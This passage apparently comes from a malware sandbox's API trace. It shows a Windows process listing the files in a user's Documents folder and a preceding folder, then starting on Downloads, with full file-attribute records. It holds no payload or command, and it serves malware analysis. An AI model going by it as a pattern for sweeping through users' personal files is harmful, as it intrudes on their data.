lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cb4d310, ftCreationTime.dwHighDateTime=0x1d5dff6, ftLastAccessTime.dwLowDateTime=0x4ac5c990, ftLastAccessTime.dwHighDateTime=0x1d5db15, ftLastWriteTime.dwLowDateTime=0x4ac5c990, ftLastWriteTime.dwHighDateTime=0x1d5db15, nFileSizeHigh=0x0, nFileSizeLow=0x4956, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RSwBc ju7leGFg.bmp", cAlternateFileName="RSWBCJ~1.BMP")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb08a5c90, ftCreationTime.dwHighDateTime=0x1d5decc, ftLastAccessTime.dwLowDateTime=0x107f7250, ftLastAccessTime.dwHighDateTime=0x1d5e5a5, ftLastWriteTime.dwLowDateTime=0x107f7250, ftLastWriteTime.dwHighDateTime=0x1d5e5a5, nFileSizeHigh=0x0, nFileSizeLow=0x128e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S-ySOqN.png", cAlternateFileName="")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72e00e30, ftCreationTime.dwHighDateTime=0x1d5db84, ftLastAccessTime.dwLowDateTime=0xe9f509b0, ftLastAccessTime.dwHighDateTime=0x1d5e149, ftLastWriteTime.dwLowDateTime=0xe9f509b0, ftLastWriteTime.dwHighDateTime=0x1d5e149, nFileSizeHigh=0x0, nFileSizeLow=0xfa41, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SfxkhLPbwY80mBkm.xls", cAlternateFileName="SFXKHL~1.XLS")) returned 1 [0209.929] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe49592a0, ftCreationTime.dwHighDateTime=0x1d5e2c5, ftLastAccessTime.dwLowDateTime=0x55009d80, ftLastAccessTime.dwHighDateTime=0x1d5e237, ftLastWriteTime.dwLowDateTime=0x55009d80, ftLastWriteTime.dwHighDateTime=0x1d5e237, nFileSizeHigh=0x0, nFileSizeLow=0x9e67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VUWIWnIn.flv", cAlternateFileName="")) returned 1 [0209.930] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec2b18a0, ftCreationTime.dwHighDateTime=0x1d5e5e0, ftLastAccessTime.dwLowDateTime=0xd97d2740, ftLastAccessTime.dwHighDateTime=0x1d5dd14, ftLastWriteTime.dwLowDateTime=0xd97d2740, ftLastWriteTime.dwHighDateTime=0x1d5dd14, nFileSizeHigh=0x0, nFileSizeLow=0x7c31, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WmmnVLU-BNO.avi", cAlternateFileName="WMMNVL~1.AVI")) returned 1 [0209.930] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc72eda30, ftCreationTime.dwHighDateTime=0x1d5dcdc, ftLastAccessTime.dwLowDateTime=0xe3aa6280, ftLastAccessTime.dwHighDateTime=0x1d5e108, ftLastWriteTime.dwLowDateTime=0xe3aa6280, ftLastWriteTime.dwHighDateTime=0x1d5e108, nFileSizeHigh=0x0, nFileSizeLow=0x6190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x964-eas.m4a", cAlternateFileName="")) returned 1 [0209.930] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb70d0520, ftCreationTime.dwHighDateTime=0x1d5de88, ftLastAccessTime.dwLowDateTime=0x34958900, ftLastAccessTime.dwHighDateTime=0x1d5da7d, ftLastWriteTime.dwLowDateTime=0x34958900, ftLastWriteTime.dwHighDateTime=0x1d5da7d, nFileSizeHigh=0x0, nFileSizeLow=0xb8e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XaWwXBXYIawHD9.avi", cAlternateFileName="XAWWXB~1.AVI")) returned 1 [0209.930] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc986a50, ftCreationTime.dwHighDateTime=0x1d5dc74, ftLastAccessTime.dwLowDateTime=0x2200ba80, ftLastAccessTime.dwHighDateTime=0x1d5dece, ftLastWriteTime.dwLowDateTime=0x2200ba80, ftLastWriteTime.dwHighDateTime=0x1d5dece, nFileSizeHigh=0x0, nFileSizeLow=0x2207, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XzYFex6f-HCCOD.wav", cAlternateFileName="XZYFEX~1.WAV")) returned 1 [0209.930] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4dd2a130, ftCreationTime.dwHighDateTime=0x1d5dcd2, ftLastAccessTime.dwLowDateTime=0x7d8719c0, ftLastAccessTime.dwHighDateTime=0x1d5dc09, ftLastWriteTime.dwLowDateTime=0x7d8719c0, ftLastWriteTime.dwHighDateTime=0x1d5dc09, nFileSizeHigh=0x0, nFileSizeLow=0x139ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YPJ9.mp3", cAlternateFileName="")) returned 1 [0209.930] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59de3c10, ftCreationTime.dwHighDateTime=0x1d5dd26, ftLastAccessTime.dwLowDateTime=0xb64407c0, ftLastAccessTime.dwHighDateTime=0x1d5e215, ftLastWriteTime.dwLowDateTime=0xb64407c0, ftLastWriteTime.dwHighDateTime=0x1d5e215, nFileSizeHigh=0x0, nFileSizeLow=0x11421, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zjYvg.wav", cAlternateFileName="")) returned 1 [0209.930] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17fbe700, ftCreationTime.dwHighDateTime=0x1d5ddc8, ftLastAccessTime.dwLowDateTime=0x7e51cad0, ftLastAccessTime.dwHighDateTime=0x1d5e46f, ftLastWriteTime.dwLowDateTime=0x7e51cad0, ftLastWriteTime.dwHighDateTime=0x1d5e46f, nFileSizeHigh=0x0, nFileSizeLow=0xee66, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_fcNT.wav", cAlternateFileName="")) returned 1 [0209.930] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17fbe700, ftCreationTime.dwHighDateTime=0x1d5ddc8, ftLastAccessTime.dwLowDateTime=0x7e51cad0, ftLastAccessTime.dwHighDateTime=0x1d5e46f, ftLastWriteTime.dwLowDateTime=0x7e51cad0, ftLastWriteTime.dwHighDateTime=0x1d5e46f, nFileSizeHigh=0x0, nFileSizeLow=0xee66, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_fcNT.wav", cAlternateFileName="")) returned 0 [0209.930] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.930] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.930] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0209.930] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.930] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.930] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.930] PathFindFileNameW (pszPath="") returned="" [0209.930] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd99ba3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd99ba3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.931] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd99ba3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd99ba3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.931] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53aee3a0, ftCreationTime.dwHighDateTime=0x1d5d135, ftLastAccessTime.dwLowDateTime=0xbf5b4690, ftLastAccessTime.dwHighDateTime=0x1d59722, ftLastWriteTime.dwLowDateTime=0xbf5b4690, ftLastWriteTime.dwHighDateTime=0x1d59722, nFileSizeHigh=0x0, nFileSizeLow=0x11e20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0vuZeH8JbX.docx", cAlternateFileName="0VUZEH~1.DOC")) returned 1 [0209.931] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec3e5c10, ftCreationTime.dwHighDateTime=0x1d5d9b7, ftLastAccessTime.dwLowDateTime=0xfd8da250, ftLastAccessTime.dwHighDateTime=0x1d5b595, ftLastWriteTime.dwLowDateTime=0xfd8da250, ftLastWriteTime.dwHighDateTime=0x1d5b595, nFileSizeHigh=0x0, nFileSizeLow=0x2448, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2GP755S YY6b.xlsx", cAlternateFileName="2GP755~1.XLS")) returned 1 [0209.931] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6bad530, ftCreationTime.dwHighDateTime=0x1d5e3b2, ftLastAccessTime.dwLowDateTime=0xe7bc1700, ftLastAccessTime.dwHighDateTime=0x1d57598, ftLastWriteTime.dwLowDateTime=0xe7bc1700, ftLastWriteTime.dwHighDateTime=0x1d57598, nFileSizeHigh=0x0, nFileSizeLow=0x2f47, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2QbXHfY0a4AjS2sC.pptx", cAlternateFileName="2QBXHF~1.PPT")) returned 1 [0209.931] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6818950, ftCreationTime.dwHighDateTime=0x1d5a2eb, ftLastAccessTime.dwLowDateTime=0x64fcb910, ftLastAccessTime.dwHighDateTime=0x1d55b6b, ftLastWriteTime.dwLowDateTime=0x64fcb910, ftLastWriteTime.dwHighDateTime=0x1d55b6b, nFileSizeHigh=0x0, nFileSizeLow=0xfc4a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3agJs7nPJdZ2eI.docx", cAlternateFileName="3AGJS7~1.DOC")) returned 1 [0209.931] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30864790, ftCreationTime.dwHighDateTime=0x1d5b9ea, ftLastAccessTime.dwLowDateTime=0xbcbe8110, ftLastAccessTime.dwHighDateTime=0x1d5bb10, ftLastWriteTime.dwLowDateTime=0xbcbe8110, ftLastWriteTime.dwHighDateTime=0x1d5bb10, nFileSizeHigh=0x0, nFileSizeLow=0x4ec1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4dOc.docx", cAlternateFileName="4DOC~1.DOC")) returned 1 [0209.931] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2305e0, ftCreationTime.dwHighDateTime=0x1d5e265, ftLastAccessTime.dwLowDateTime=0xe9a44d40, ftLastAccessTime.dwHighDateTime=0x1d5dc49, ftLastWriteTime.dwLowDateTime=0xe9a44d40, ftLastWriteTime.dwHighDateTime=0x1d5dc49, nFileSizeHigh=0x0, nFileSizeLow=0x70e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4l-Mi22fVj9HTyGXTBe.rtf", cAlternateFileName="4L-MI2~1.RTF")) returned 1 [0209.931] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cef3c0, ftCreationTime.dwHighDateTime=0x1d59276, ftLastAccessTime.dwLowDateTime=0x98b13c60, ftLastAccessTime.dwHighDateTime=0x1d5d7f1, ftLastWriteTime.dwLowDateTime=0x98b13c60, ftLastWriteTime.dwHighDateTime=0x1d5d7f1, nFileSizeHigh=0x0, nFileSizeLow=0x14b7d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5QehJ-chz.xlsx", cAlternateFileName="5QEHJ-~1.XLS")) returned 1 [0209.931] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec7b3360, ftCreationTime.dwHighDateTime=0x1d593ad, ftLastAccessTime.dwLowDateTime=0xb8afc2f0, ftLastAccessTime.dwHighDateTime=0x1d59379, ftLastWriteTime.dwLowDateTime=0xb8afc2f0, ftLastWriteTime.dwHighDateTime=0x1d59379, nFileSizeHigh=0x0, nFileSizeLow=0x1f44, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6leiTZ.docx", cAlternateFileName="6LEITZ~1.DOC")) returned 1 [0209.931] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5bca510, ftCreationTime.dwHighDateTime=0x1d59291, ftLastAccessTime.dwLowDateTime=0x5166c920, ftLastAccessTime.dwHighDateTime=0x1d5e7c2, ftLastWriteTime.dwLowDateTime=0x5166c920, ftLastWriteTime.dwHighDateTime=0x1d5e7c2, nFileSizeHigh=0x0, nFileSizeLow=0x5537, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="a6fEh.xlsx", cAlternateFileName="A6FEH~1.XLS")) returned 1 [0209.931] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb209cd90, ftCreationTime.dwHighDateTime=0x1d560bd, ftLastAccessTime.dwLowDateTime=0xb4ee73b0, ftLastAccessTime.dwHighDateTime=0x1d5c596, ftLastWriteTime.dwLowDateTime=0xb4ee73b0, ftLastWriteTime.dwHighDateTime=0x1d5c596, nFileSizeHigh=0x0, nFileSizeLow=0x727c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Bhvkqti- a2heHB.pptx", cAlternateFileName="BHVKQT~1.PPT")) returned 1 [0209.931] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0209.931] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf392c380, ftCreationTime.dwHighDateTime=0x1d56d0a, ftLastAccessTime.dwLowDateTime=0x24898410, ftLastAccessTime.dwHighDateTime=0x1d56e87, ftLastWriteTime.dwLowDateTime=0x24898410, ftLastWriteTime.dwHighDateTime=0x1d56e87, nFileSizeHigh=0x0, nFileSizeLow=0x15bee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e2QoKTBJ.pptx", cAlternateFileName="E2QOKT~1.PPT")) returned 1 [0209.931] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f6a550, ftCreationTime.dwHighDateTime=0x1d5e62a, ftLastAccessTime.dwLowDateTime=0xcc080e10, ftLastAccessTime.dwHighDateTime=0x1d5e744, ftLastWriteTime.dwLowDateTime=0xcc080e10, ftLastWriteTime.dwHighDateTime=0x1d5e744, nFileSizeHigh=0x0, nFileSizeLow=0xd491, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IUKPZNXasUl_cxb.docx", cAlternateFileName="IUKPZN~1.DOC")) returned 1 [0209.931] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f3b32a0, ftCreationTime.dwHighDateTime=0x1d5af03, ftLastAccessTime.dwLowDateTime=0xcf84a810, ftLastAccessTime.dwHighDateTime=0x1d5afd5, ftLastWriteTime.dwLowDateTime=0xcf84a810, ftLastWriteTime.dwHighDateTime=0x1d5afd5, nFileSizeHigh=0x0, nFileSizeLow=0x1841a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jHQSeSZMa625b.pptx", cAlternateFileName="JHQSES~1.PPT")) returned 1 [0209.931] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9dd3ebc0, ftCreationTime.dwHighDateTime=0x1d58deb, ftLastAccessTime.dwLowDateTime=0x116f6570, ftLastAccessTime.dwHighDateTime=0x1d5822d, ftLastWriteTime.dwLowDateTime=0x116f6570, ftLastWriteTime.dwHighDateTime=0x1d5822d, nFileSizeHigh=0x0, nFileSizeLow=0x1340a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MIsET.docx", cAlternateFileName="MISET~1.DOC")) returned 1 [0209.931] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48fab230, ftCreationTime.dwHighDateTime=0x1d5e5b8, ftLastAccessTime.dwLowDateTime=0x1cc9ee70, ftLastAccessTime.dwHighDateTime=0x1d5d865, ftLastWriteTime.dwLowDateTime=0x1cc9ee70, ftLastWriteTime.dwHighDateTime=0x1d5d865, nFileSizeHigh=0x0, nFileSizeLow=0x902e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MxfHp.ppt", cAlternateFileName="")) returned 1 [0209.931] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0209.931] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0209.932] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0209.932] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0209.932] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0209.932] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92e9ad00, ftCreationTime.dwHighDateTime=0x1d5d862, ftLastAccessTime.dwLowDateTime=0x602052a0, ftLastAccessTime.dwHighDateTime=0x1d5dcb5, ftLastWriteTime.dwLowDateTime=0x602052a0, ftLastWriteTime.dwHighDateTime=0x1d5dcb5, nFileSizeHigh=0x0, nFileSizeLow=0x16f1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rd9dikUFlBmXFe1qsoy.pps", cAlternateFileName="RD9DIK~1.PPS")) returned 1 [0209.932] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1124e10, ftCreationTime.dwHighDateTime=0x1d5dea1, ftLastAccessTime.dwLowDateTime=0x3fa8a7d0, ftLastAccessTime.dwHighDateTime=0x1d5dcfa, ftLastWriteTime.dwLowDateTime=0x3fa8a7d0, ftLastWriteTime.dwHighDateTime=0x1d5dcfa, nFileSizeHigh=0x0, nFileSizeLow=0x1732, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="StTqzP2 bVx.rtf", cAlternateFileName="STTQZP~1.RTF")) returned 1 [0209.932] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17f7b0c0, ftCreationTime.dwHighDateTime=0x1d5dbe5, ftLastAccessTime.dwLowDateTime=0xcbece920, ftLastAccessTime.dwHighDateTime=0x1d5d897, ftLastWriteTime.dwLowDateTime=0xcbece920, ftLastWriteTime.dwHighDateTime=0x1d5d897, nFileSizeHigh=0x0, nFileSizeLow=0xc8ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sUBwSOUxzs1.pptx", cAlternateFileName="SUBWSO~1.PPT")) returned 1 [0209.932] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c862360, ftCreationTime.dwHighDateTime=0x1d56511, ftLastAccessTime.dwLowDateTime=0x8f399e10, ftLastAccessTime.dwHighDateTime=0x1d585f4, ftLastWriteTime.dwLowDateTime=0x8f399e10, ftLastWriteTime.dwHighDateTime=0x1d585f4, nFileSizeHigh=0x0, nFileSizeLow=0xf82b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V3 XRFAnoiQYiAuBOs.xlsx", cAlternateFileName="V3XRFA~1.XLS")) returned 1 [0209.932] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e062460, ftCreationTime.dwHighDateTime=0x1d5dfa4, ftLastAccessTime.dwLowDateTime=0xcc0be400, ftLastAccessTime.dwHighDateTime=0x1d5dd93, ftLastWriteTime.dwLowDateTime=0xcc0be400, ftLastWriteTime.dwHighDateTime=0x1d5dd93, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y5VbixHYeFSBUXkYrU1j", cAlternateFileName="Y5VBIX~1")) returned 1 [0209.932] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65474220, ftCreationTime.dwHighDateTime=0x1d5d2b5, ftLastAccessTime.dwLowDateTime=0xce2999d0, ftLastAccessTime.dwHighDateTime=0x1d572a9, ftLastWriteTime.dwLowDateTime=0xce2999d0, ftLastWriteTime.dwHighDateTime=0x1d572a9, nFileSizeHigh=0x0, nFileSizeLow=0xd438, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZWcVGEhZXSAZ8VfaWOP.xlsx", cAlternateFileName="ZWCVGE~1.XLS")) returned 1 [0209.932] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad95e9b0, ftCreationTime.dwHighDateTime=0x1d56d97, ftLastAccessTime.dwLowDateTime=0x3fe168f0, ftLastAccessTime.dwHighDateTime=0x1d58925, ftLastWriteTime.dwLowDateTime=0x3fe168f0, ftLastWriteTime.dwHighDateTime=0x1d58925, nFileSizeHigh=0x0, nFileSizeLow=0x11fdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_C L.pptx", cAlternateFileName="_CL~1.PPT")) returned 1 [0209.932] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad95e9b0, ftCreationTime.dwHighDateTime=0x1d56d97, ftLastAccessTime.dwLowDateTime=0x3fe168f0, ftLastAccessTime.dwHighDateTime=0x1d58925, ftLastWriteTime.dwLowDateTime=0x3fe168f0, ftLastWriteTime.dwHighDateTime=0x1d58925, nFileSizeHigh=0x0, nFileSizeLow=0x11fdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_C L.pptx", cAlternateFileName="_CL~1.PPT")) returned 0 [0209.933] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.933] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.933] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0209.933] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.933] PathFindFileNameW 